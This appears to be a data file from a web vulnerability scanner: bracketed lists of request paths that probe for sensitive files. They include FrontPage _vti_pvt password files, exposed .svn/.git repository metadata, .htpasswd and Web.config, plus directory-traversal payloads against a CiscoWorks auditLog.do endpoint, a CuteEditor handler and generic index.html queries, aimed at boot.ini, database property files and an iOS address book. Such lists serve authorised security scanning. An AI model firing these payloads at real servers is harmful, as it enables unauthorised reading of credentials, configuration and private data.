[/_vti_pvt/access.cnf,/_vti_pvt/administrator.pwd,/_vti_pvt/administrators.pwd,/_vti_pvt/authors.pwd,/_vti_pvt/bots.cnf,/_vti_pvt/botinfs.cnf,/_vti_pvt/deptodoc.btr,/_vti_pvt/doctodep.btr,/_vti_pvt/frontpg.lck,/_vti_pvt/linkinfo.cnf,/_vti_pvt/service.cnf,/_vti_pvt/service.grp,/_vti_pvt/service.lck,/_vti_pvt/service.pwd,/_vti_pvt/Service.stp,/_vti_pvt/services.cnf,/_vti_pvt/services.org,/_vti_pvt/structure.cnf,/_vti_pvt/svcacl.cnf,/_vti_pvt/users.pwd,/_vti_pvt/uniqueperm.cnf,/_vti_pvt/writeto.cnf,/.svn/,/.svn/text-base/.htaccess.svn-base,/.svn/text-base/.htpasswd.svn-base,/.svn/text-base/Web.config.svn-base,/.git/HEAD,/.hg/requires,/.bzr/README,/downloadFile.php,/BackupConfig.php,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\log\dbpwdChange.log,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb,/Info.live.htm,/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config]
[/_vti_pvt/administrator.pwd]
[/_vti_pvt/administrators.pwd]
[/_vti_pvt/authors.pwd]
[/_vti_pvt/service.pwd]
[/_vti_pvt/users.pwd]
[/~1*/*.aspx?aspxerrorpath=/]
[/~1/*.aspx?aspxerrorpath=/]
[/~root]
[index.html?../../../../../boot.ini]
[index.html?..\..\..\..\..\boot.ini]
[\\..%2f..%2f..%2f..%2fboot.ini%]
